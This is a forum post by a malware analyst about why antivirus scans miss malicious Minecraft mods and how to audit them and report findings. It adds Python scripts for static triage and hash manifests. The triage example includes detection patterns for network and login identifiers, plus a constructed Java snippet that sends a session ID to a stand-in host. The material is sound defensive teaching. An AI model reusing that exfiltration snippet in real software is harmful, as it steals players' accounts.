What makes me such an expert on malware?
I reverse engineer malware for a living, and while that may sound cool it's mostly staring at x86 assembly code in IDA Pro for 40 hours a week and writing reports. But hey, it's in high demand and the pay is great.
There is something I see often on this forum that makes me shake my head each time I read it. Time and time again I see people submitting some new mod to VirusTotal or a similar service and then declaring that it's safe based on the results.
The flaw in this is that even if the mod has malicious routines, VirusTotal won't detect it.
You're probably thinking that it has to be safe when it gets scanned by all those engines, right?
Wrong!
The key to that answer is that antivirus engines, aside from a few that also do behavioral detection, rely on signatures to do their detection. A signature, a fingerprint for a piece of code, is based on a unique pattern found within a file. If no one has created a signature for a piece of malware there is nothing for the engine to match, and all that is left is behavioral detection, which looks for anomalous behavior such as a program trying to inject its code into Internet Explorer or a driver, or trying to monitor the keyboard when its window isn't focused.
The problem is that a good coder can find ways around behavioral detection, and it's trivial to rearrange a binary to alter its fingerprint with polymorphic substitutions. Think of a deck of cards as a representation of a file. When you copy that file the deck is always in the same order. If you create a signature for this file it's going to rely on the order the cards are in. In simplified terms, polymorphic code means the deck is reshuffled each time. It still does the same thing, but the signature has changed. Antivirus is only going to detect malware that's widespread enough to have been noticed and had signatures created.
So how does this apply to mods?
The mods are Java, and outside of an exploit that affects the system from outside the Java virtual machine (which happens from time to time, so keep your Java updated) they're contained to the running program, Minecraft. This creates problems when you rely on antivirus, which can see Java running but can't look inside the Java virtual machine, so unless there's a piece of code that has had a fingerprint created (very rare for Java) and is caught when the file is checked as it's opened, there isn't going to be an antivirus alert.
The biggest threat from malicious mods is account theft. If someone can code a mod then the class handling the login authentication can be modified too, and unless you've got some quality Java reverse engineering tools with their hooks in the running code it's rather hard to detect. There are other malicious things that can be done too, such as deleting your saves, but I'll focus on account theft for the moment.
The simplest way to determine whether a mod has malicious routines is to audit the source. If it's creating its own network connections it's fairly suspect to begin with, as there is no good reason any legitimate mod should be doing so unless the mod is specifically designed to and openly states that it does. A mod should never interact with login authentication, no matter what justification the author tries to give.
If you don't know how to read code then you step past static analysis and into the world of dynamic analysis, aka running it and seeing what it does. The only network connections Java should create while Minecraft is running are one to authenticate with minecraft.net and one to the server you're playing on if you're doing SMP. There are a number of tools for this, but the one I'll mention is Process Monitor from Sysinternals. It's a Microsoft tool you can get from TechNet, and while it has a learning curve you can filter it down to the Java instance Minecraft is running in and to network connections only.
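A first pass at the source audit described above can be scripted: the following is an added example (not code from the original post) that flags lines of decompiled Java touching networking or login-related identifiers so a reviewer knows where to read closely. The indicator list and the sample source are constructed for illustration; a hit is a place to look, not a verdict.

```python
# Static triage of decompiled mod source (added example, not from the original post).
# Flags lines that touch networking or the login path so a reviewer knows where to
# read closely. Indicator list and sample source are constructed for illustration.
import re

# (label, pattern). Network: anything that can open a connection of its own.
# Auth: identifiers a mod has no business handling, per the post.
INDICATORS = [
    ("network", re.compile(r"\bjava\.net\.(Socket|URL|URLConnection|HttpURLConnection|DatagramSocket)\b")),
    ("network", re.compile(r"\bnew\s+(Socket|URL|DatagramSocket)\s*\(")),
    ("network", re.compile(r"\.openConnection\s*\(")),
    ("auth", re.compile(r"\b(sessionId|session_id|password|passwd|username)\b", re.IGNORECASE)),
    ("auth", re.compile(r"\blogin\b", re.IGNORECASE)),
]

def triage_source(text):
    """Return [(line_no, label, stripped_line)] for each line matching an indicator.

    Trailing '//' comments are ignored so a comment mentioning 'login' does not
    count; the remainder of the line is matched against each indicator in order
    and the first hit is reported.
    """
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        code = line.split("//", 1)[0]
        for label, pattern in INDICATORS:
            if pattern.search(code):
                hits.append((no, label, line.strip()))
                break
    return hits

# Constructed decompiled source standing in for a mod under review (not a real mod).
SAMPLE_SOURCE = """\
package example.mod;
import java.net.Socket;

public class FancyBlocks {
    public void onLogin(String username, String sessionId) throws Exception {
        Socket s = new Socket("198.51.100.7", 4444); // not the auth server
        s.getOutputStream().write(sessionId.getBytes());
    }
    public void placeBlock(int x, int y, int z) { /* ordinary game logic */ }
}
"""

if __name__ == "__main__":
    for no, label, line in triage_source(SAMPLE_SOURCE):
        print(f"line {no:>3} [{label:7}] {line}")
```

On the sample this reports the Socket import, the login handler's parameters, the new Socket, and the write of sessionId, which is exactly the combination the post says no legitimate mod needs.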
Sysinternals Process Tools page
If you ever come across a Windows executable in a mod download, just delete it even if it doesn't pop on VirusTotal.
The big question is how to maintain the safety of people downloading mods from the forums.
The biggest safety net will always be a system of peer review by trusted individuals. This is assisted by authors posting their source code. I know some will be hostile to that request, but Minecraft can be decompiled, modified, and recompiled rather easily, and so can your mod. Is it really that painful to add another bit.ly link and get extra clicks? That's not to say that someone doing a review should only look at the source. They need to focus on the decompiled code, but having the original as a reference for comparison is helpful.
You found a malicious mod!?! OMG flame the thread!
Uh... no
If you discover something that makes you think a mod is malicious, the proper response is a well-documented one so others can review what you've found and confirm or disprove it. Starting a flame war on the mod thread isn't going to do anything constructive. It's the administrators' and moderators' job to police the forum, not yours.
In a post describing what you found, you should include a brief summary at the top, followed by your findings with references to the tools you used, code snippets referenced to file and line numbers, and other supporting information, including hash values of all the files referenced (including hashes of the original files you downloaded) and the source link.
At the end of this include a link to your analysis material in a zip archive that should contain:
- A text file containing your analysis steps and tools used so others can follow your process.
- The original files you downloaded in their own directory
- The decompiled source you examined in its own directory, if any
- A text file with file names and MD5 hashes of all included files.
- Screenshots of the post you downloaded the mod from will help if the author changes the links.
This may seem like a lot, but its purpose is to support the integrity of the contained items. You're essentially documenting evidence for a case to ban someone, or possibly the start of legal action by someone against the author.
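The hash manifest on that list is easy to get wrong by hand (a missed file, a hash of the wrong copy). The script below is an added example, not part of the original post: it walks an analysis directory laid out as the list describes and writes the file-name-and-hash text file. Recording SHA-256 next to the MD5 the post asks for is this example's own addition, since MD5 collisions are cheap to produce; the sample tree is constructed so the script runs stand-alone.

```python
# Hash manifest for a mod-analysis archive (added example, not from the post).
# SHA-256 is recorded next to MD5 as this example's own addition: MD5 collisions
# are cheap to produce, so a second hash makes a swapped file harder to hide.
import hashlib
import os
import tempfile

def hash_file(path):
    """Return (md5_hex, sha256_hex) of a file, read in 64 KiB chunks."""
    md5, sha = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            md5.update(chunk)
            sha.update(chunk)
    return md5.hexdigest(), sha.hexdigest()

def build_manifest(root, manifest_name="HASHES.txt"):
    """Hash every file under root (except the manifest itself), write and return it.

    Paths are root-relative with '/' separators and sorted, so anyone re-running
    this on the same extracted archive gets byte-identical text to diff against.
    """
    entries = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel != manifest_name:
                md5_hex, sha_hex = hash_file(full)
                entries.append(f"{rel}\tMD5={md5_hex}\tSHA256={sha_hex}")
    text = "\n".join(sorted(entries)) + "\n"
    with open(os.path.join(root, manifest_name), "w") as fh:
        fh.write(text)
    return text

def make_sample_archive():
    """Constructed tree laid out like the post's list: original/, decompiled/, notes."""
    root = tempfile.mkdtemp(prefix="mod_analysis_")
    files = {  # contents are placeholders, not a real mod download
        "original/FancyBlocks.zip": b"placeholder bytes standing in for the download",
        "decompiled/FancyBlocks.java": b"public class FancyBlocks {}\n",
        "ANALYSIS.txt": b"Steps taken and tools used go here.\n",
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root
```

Run `build_manifest(make_sample_archive())` to see the output; on a real analysis directory, call `build_manifest` on the extracted archive root and include the resulting HASHES.txt in the zip.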